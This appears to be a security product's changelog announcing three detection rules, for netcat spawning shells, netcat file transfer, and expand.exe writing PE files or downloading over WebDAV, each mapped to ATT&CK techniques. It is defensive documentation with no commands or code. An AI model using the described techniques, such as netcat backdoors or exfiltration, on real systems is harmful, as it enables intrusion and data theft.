==================================================

CREATED: ANY-NETCAT-PROC-EXEC (#1221)

Description

Identifies instances of netcat being used to execute or launch another process, such as a shell of some sort.  This can be used to set up a backdoor or other remote access.

References

ATT&CK Technique T1059 & T1104

==================================================

CREATED: ANY-NETCAT-FILE-TRANSFER (#1222)

Description

Identifies instances of netcat being used to transfer files to another system. This can be used to exfiltrate data, or stage in preparation for exfiltration.

References

ATT&CK Technique T1074 & T1105

==================================================

CREATED: WIN-EXPAND-WRITE-PE (#1232)

Description

Identifies expand.exe  writing a PE file, as it commonly only writes .tmp extension type files. Open source intel also shows that expand.exe  can be used to create a WEBDav call to download resources from external sites.

References

ATT&CK Technique T1085 & T1105

Did this answer your question?